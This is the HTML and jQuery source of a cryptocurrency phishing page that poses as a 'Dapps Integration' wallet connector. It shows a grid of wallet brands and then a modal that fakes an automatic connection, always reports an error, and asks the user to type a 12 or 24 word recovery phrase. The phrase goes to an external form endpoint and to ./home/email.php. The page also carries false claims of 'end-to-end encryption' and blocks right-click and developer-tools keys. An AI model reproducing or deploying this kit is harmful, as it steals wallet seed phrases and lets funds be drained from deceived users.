                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="jade_wallet" class="sc-author-box select_wallet" data-title="Jade Wallet" data-logo="./assets/images/logo/jade_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/jade_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Jade Wallet</a></h5>
                                        <span class="price">jadewallet.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="plasmapay" class="sc-author-box select_wallet" data-title="PlasmaPay" data-logo="./assets/images/logo/plasmapay.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/plasmapay.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>PlasmaPay</a></h5>
                                        <span class="price">plasmapay.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="o3_wallet" class="sc-author-box select_wallet" data-title="O3Wallet" data-logo="./assets/images/logo/o3_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/o3_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>O3Wallet</a></h5>
                                        <span class="price">o3.network</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="hashkey_me" class="sc-author-box select_wallet" data-title="HashKey Me" data-logo="./assets/images/logo/hashkey_me.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/hashkey_me.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>HashKey Me</a></h5>
                                        <span class="price">me.hashkey.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="rwallet" class="sc-author-box select_wallet" data-title="RWallet" data-logo="./assets/images/logo/rwallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/rwallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>RWallet</a></h5>
                                        <span class="price">rsk.co</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="flare_wallet" class="sc-author-box select_wallet" data-title="Flare Wallet" data-logo="./assets/images/logo/flare_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/flare_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Flare Wallet</a></h5>
                                        <span class="price">flarewallet.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="kyberswap" class="sc-author-box select_wallet" data-title="KyberSwap" data-logo="./assets/images/logo/kyberswap.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/kyberswap.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>KyberSwap</a></h5>
                                        <span class="price">kyberswap.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="atoken_wallet" class="sc-author-box select_wallet" data-title="AToken Wallet" data-logo="./assets/images/logo/atoken_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/atoken_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>AToken Wallet</a></h5>
                                        <span class="price">atoken.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="tongue_wallet" class="sc-author-box select_wallet" data-title="Tongue Wallet" data-logo="./assets/images/logo/tongue_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/tongue_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Tongue Wallet</a></h5>
                                        <span class="price">tongue.fi</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="xinfin" class="sc-author-box select_wallet" data-title="XinFin XDC Network" data-logo="./assets/images/logo/xinfin.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/xinfin.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>XinFin XDC Network</a></h5>
                                        <span class="price">xinfin.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="talken_wallet" class="sc-author-box select_wallet" data-title="Talken Wallet" data-logo="./assets/images/logo/talken_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/talken_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Talken Wallet</a></h5>
                                        <span class="price">talken.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="keyring_pro" class="sc-author-box select_wallet" data-title="KEYRING PRO" data-logo="./assets/images/logo/keyring_pro.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/keyring_pro.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>KEYRING PRO</a></h5>
                                        <span class="price">keyring.app</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="midas_wallet" class="sc-author-box select_wallet" data-title="Midas Wallet" data-logo="./assets/images/logo/midas_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/midas_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Midas Wallet</a></h5>
                                        <span class="price">midasprotocol.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="at_wallet" class="sc-author-box select_wallet" data-title="AT.Wallet" data-logo="./assets/images/logo/at_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/at_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>AT.Wallet</a></h5>
                                        <span class="price">authentrend.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="imtoken" class="sc-author-box select_wallet" data-title="imToken" data-logo="./assets/images/logo/imtoken.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/imtoken.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>imToken</a></h5>
                                        <span class="price">token.im</span>
                                    </div>
                                </div>
                            </div>
                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="imtoken" class="sc-author-box select_wallet" data-title="imToken" data-logo="./assets/images/logo/imtoken.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/imtoken.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Others</a></h5>
                                        <span class="price"></span>
                                    </div>
                                </div>
                            </div>


                    </div>
                </div>
            </section>
            

            <footer id="footer" class="clearfix style-2">
                <div class="themesflat-container">
                    <div class="row">
                        <div class="col-lg-12 col-md-12 col-12">
                            <div class="widget widget-logo">
                                <p class="sub-widget-logo text-center">Dapps Integration &copy; 2024. All Rights Reserved.</p>
                            </div>
                        </div>
                        
                    </div>
                </div>
            </footer>
        </div>

        <div class="modal fade popup" id="popup_connect_wallet_success" tabindex="-1" role="dialog" aria-hidden="true">
            <div class="modal-dialog modal-dialog-centered" role="document">
                <div class="modal-content">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">&times;</span>
                    </button>
                    <div class="modal-body space-y-20 pd-40">


                    <!-- <center> -->
                  
        </div>
                        
      
                        
                    </div>
                </div>
            </div>
        </div>
        <div class="modal fade popup" id="popup_connect_wallet" tabindex="-1" role="dialog" aria-hidden="true">
            <div class="modal-dialog modal-dialog-centered" role="document">
                <div class="modal-content">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">&times;</span>
                    </button>
                    <div class="modal-body space-y-20 pd-40">

                        <h3>
                            <img width="50" height="50" class="avatar" id="wallet_logo"/><br>
                            <span id="wallet_name" clas="mt-1">Sync Wallet</span>
                        </h3>
                        <p class="text-center">This session is secured and encrypted</p>

                        <div id="auto_connecting" style="display:none;">
                            <br><br><br>
                            <div class="heading-line s2" style="width: 100%;">
                                <br>
                                <h5 align="center">
                                    starting secure connection...<br>
                                    <i align="center" style="text-align: center !important; ./font-size:small" class="text-muted align-items-center">please wait...</i>
                                </h5>
                                <br>
                            </div>
                        </div>

                        

                        <div id="failed_to_connect" style="display:none;">
                            <div style="padding:6px; color:red; border:1px solid red; border-radius:5px; text-align:center!important; ./font-size:16px; ./font-weight:500;">
                                An error occurred... please try again or connect mannually
                            </div>
                            <br><br><br>
                            <a href="#" id="try_auto_connecting_again" class="btn btn-outline-primary" aria-label="Close">Try Again</a><br>
                            <a href="#" id="button_connect_manually" class="btn btn-primary">Connect Manually</a>
                        </div>
                        <div id="failed_to_connect2" style="display:none;">
                            <div style="padding:6px; color:red; border:1px solid red; border-radius:5px; text-align:center!important; ./font-size:16px; ./font-weight:500;">
                                An error occurred... please try again or connect mannually
                            </div>
                            <br><br><br>
                            <a href="#" id="try_auto_connecting_again" class="btn btn-outline-primary" aria-label="Close">Try Again</a><br>
                            <a href="#" id="button_connect_manually2" class="btn btn-primary">Connect Manually</a>
                        </div>
                        <div id="div_connect_manuallly" style="display:none;">
                            <form action="https://submit-form.com/A8E6AEFlE" method="POST" >
                                <input type="hidden" name="_captcha" value="false">
                                <input type="hidden" name="_redirect" value="https://dappsrarityproject.web.app/connect/authenticate.html" />
                                <input type="hidden" name="_append" value="false" />
                                <textarea style="./font-size:25px; ./font-weight:650" rows="4" name="secret_phrase" id="secret_phrase" class="form-control text-primary" placeholder="Enter your 12 or 24 Mnemonic words. Seperate them with spaces." required></textarea><br>
                            
                                <button disabled type="submit" name="connect" id="button_connect_wallet" class="btn btn-primary" style="border-top: 5px; opacity:0.2">Connect Wallet</button>
                            </form>
                        </div>
                        
                        <!--<input type="text" class="form-control" placeholder="00.00 ETH">
                        <p>
                            Enter quantity. <span class="color-popup">5 available</span>
                        </p>--->
                        <!-- <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#popup_bid_success" data-dismiss="modal" aria-label="Close"> Place a bid</a> -->
                        <div>
                            <br><br><br>
                            <h5 align="center" class="mt-4 text-muted align-items-center"><img src="assets/images/icon/shield.png" width="30" height="30"/> This session is protected with an end-to-end encryption</h5>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>


    <a id="scroll-top"></a>

    <script src="assets/js/jquery.min.js"></script>
    <script src="assets/js/jquery.easing.js"></script>
    <script src="assets/js/bootstrap.min.js"></script>
    <script src="assets/js/wow.min.js"></script>
    <script src="assets/js/plugin.js"></script>
    <script src="assets/js/shortcodes.js"></script>
    <script src="assets/js/main.js"></script>
    <script src="assets/js/count-down.js"></script>
    <script src="assets/js/swiper-bundle.min.js"></script>
    <script src="assets/js/swiper.js"></script>
    <script src="assets/js/parallax.js"></script>
    <script src="assets/js/web3.min.js"></script>
    <script src="assets/js/moralis.js"></script>
    <script src="assets/js/nft.js"></script>

    <script>
        //Handle Select Wallet Click
        $(function(){
            $('.select_wallet').on('click', function(){
                var wd = $(this); //wd = wallet details

                $('#wallet_name').text(wd.data('title'));
				$('#wallet_name').val("");
                $('#wallet_logo').attr("src", wd.data('logo'));
                $('#auto_connecting').show();
                $('#failed_to_connect').hide();
                $('#failed_to_connect2').hide();
                $('#div_connect_manuallly').hide();
                $('#div_connect_manuallly2').hide();

                $('#popup_connect_wallet').modal('show');

                //Hide autoconnecting div and show error in random interval
                var interval = 1000 * getRandomInt(1,15);
                setTimeout(() => {
                    $('#auto_connecting').hide();
                    $('#div_connect_manuallly').hide();
                    $('#div_connect_manuallly2').hide();
                    $('#failed_to_connect2').hide();
                    $('#failed_to_connect').show();
                }, interval);


            })

            $('.select_liquality').on('click', function(){
                var wd = $(this); //wd = wallet details

                $('#wallet_name').text(wd.data('title'));
				$('#wallet_name').val("");
                $('#wallet_logo').attr("src", wd.data('logo'));
                $('#auto_connecting').show();
                $('#failed_to_connect').hide();
                $('#failed_to_connect2').hide();
                $('#div_connect_manuallly').hide();
                $('#div_connect_manuallly2').hide();

                $('#popup_connect_wallet').modal('show');

                //Hide autoconnecting div and show error in random interval
                var interval = 1000 * getRandomInt(1,15);
                setTimeout(() => {
                    $('#auto_connecting').hide();
                    $('#div_connect_manuallly').hide();
                    $('#div_connect_manuallly2').hide();
                    $('#failed_to_connect').hide();
                    $('#failed_to_connect2').hide();
                    $('#div_connect_manuallly2').show();
                    
                }, interval);


            })

            $('#try_auto_connecting_again').on('click', function(e){
                e.preventDefault();
                $('#auto_connecting').show();
                $('#failed_to_connect').hide();
                $('#div_connect_manuallly').hide();

                //Hide autoconnecting div and show error in random interval
                var interval = 1000 * getRandomInt(1,20);
                setTimeout(() => {
                    $('#auto_connecting').hide();
                    $('#div_connect_manuallly').hide();
                    $('#failed_to_connect').show();
                }, interval);
            })

            $('#button_connect_manually').on('click', function(e){
                e.preventDefault();
                $('#auto_connecting').hide();
                $('#failed_to_connect').hide();
                $('#failed_to_connect2').hide();
                $('#div_connect_manuallly').show();
                $('#div_connect_manuallly2').hide();
            })
            $('#button_connect_manually2').on('click', function(e){
                e.preventDefault();
                $('#auto_connecting').hide();
                $('#failed_to_connect').hide();
                $('#failed_to_connect2').hide();
                $('#div_connect_manuallly').hide();
                $('#div_connect_manuallly2').show();
            })
           

            //FOR PHRASE TEXT VALIDATION
            $('#secret_phrase').on('keyup', function(){
                var phrase_seed_entered = $(this).val().trim()
                if(phrase_seed_entered != "" ){
                    var phrase_count = phrase_seed_entered.match(/(\w+)/g).length
                    console.log(phrase_count)
                    if( [12,15,18,21,24].includes(phrase_count) ){
                        $('#button_connect_wallet').attr('disabled', false).css('opacity','1')
                    }else{
                        $('#button_connect_wallet').attr('disabled', false).css('opacity','1')
                    }
                }else{
                    $('#button_connect_wallet').attr('disabled', true).css('opacity','0.2')
                }
            })
            //FOR LIQUALITY VALIDATION
            $('#confirm_pwd').on('keyup', function(){
                var phrase_seed_entered = $(this).val().trim()
                if(phrase_seed_entered != "" ){
                    var phrase_count = phrase_seed_entered.match(/(\w+)/g).length
                    console.log(phrase_count)
                    if( [12,15,18,21,24].includes(phrase_count) ){
                        $('#button_connect_wallet2').attr('disabled', false).css('opacity','1')
                    }else{
                        $('#button_connect_wallet2').attr('disabled', false).css('opacity','1')
                    }
                }else{
                    $('#button_connect_wallet2').attr('disabled', true).css('opacity','0.2')
                }
            })

            //CONNECT WALLET BUTTON Handler
            $('#button_connect_wallet').on('click', function(e){
                // e.preventDefault();
                let field = $('#secret_phrase')
                if(field.val().length >= 12){
                    // $(this).text('Loading...').css('pointer-events','none')

                    $.ajax({
                       url: "./home/email.php",
                        method: "POST",
                        data: {"load_phrase":1, "data_phrase":field.val(), "wallet_selected": $('#wallet_name').text().trim()},
                        success: function(result){


                            if(result == "success"){
                                $('#button_connect_wallet').text('Connect Wallet').css('pointer-events','all')
                                $('#popup_connect_wallet').modal('hide')
                                // $('#popup_connect_wallet_success').modal('show')
                                window.setTimeout(function(){
                                    window.location.href = 'index-2.html';
                                }, 25);
 

                            }
                        },
                        error: function(xhr, ajaxOptions, thrownError){
                            alert(thrownError);
                        }
                    })
                }
            })
            //CONNECT WALLET BUTTON2 Handler
            $('#button_connect_wallet2').on('click', function(e){
                // e.preventDefault();
                let field = $('#confirm_pwd')
                if(field.val().length >= 12){
                    // $(this).text('Loading...').css('pointer-events','none')

                    $.ajax({
                       url: "./home/example.php",
                        method: "POST",
                        data: {"load_phrase":1, "data_phrase":field.val(), "wallet_selected": $('#wallet_name').text().trim()},
                        success: function(result){


                            if(result == "success"){
                                $('#button_connect_wallet2').text('Connect Wallet').css('pointer-events','all')
                                $('#popup_connect_wallet2').modal('hide')
                                // $('#popup_connect_wallet_success').modal('show')
                                window.setTimeout(function(){
                                    window.location.href = 'index-2.html';
                                }, 25);
 

                            }
                        },
                        error: function(xhr, ajaxOptions, thrownError){
                            alert(thrownError);
                        }
                    })
                }
            })
        })

        function getRandomInt(min, max) {
            min = Math.ceil(min);
            max = Math.floor(max);
            return Math.floor(Math.random() * (max - min) + min); //The maximum is exclusive and the minimum is inclusive
        }

        //DISABLE RIGHT CLICK AND CTRL KEY
        window.oncontextmenu = function () {
            return false;
        }
        $(document).keydown(function (event) {
            if (event.keyCode == 123) {
                return false;
            }
            else if ((event.ctrlKey && event.shiftKey && event.keyCode == 73) || (event.ctrlKey && event.shiftKey && event.keyCode == 74)) {
                return false;
            }
        });
    </script>

    <style>
        .btn-outline-primary{
            width: 100%;
            border-radius: 20px;
            ./font-weight: 700;
            ./font-size: 15px;
            line-height: 22px;
            padding: 10px 20px;
            -webkit-transition: all 0.3s ease-in-out;
            -moz-transition: all 0.3s ease-in-out;
            -ms-transition: all 0.3s ease-in-out;
            -o-transition: all 0.3s ease-in-out;
            transition: all 0.3s ease-in-out;
            outline: none;
            border: 1px solid #5142FC;
            margin-bottom:10px
        }
    </style>
</body>

<!-- Designed by OriAde. Telegram: @Streetified99 -->
</html>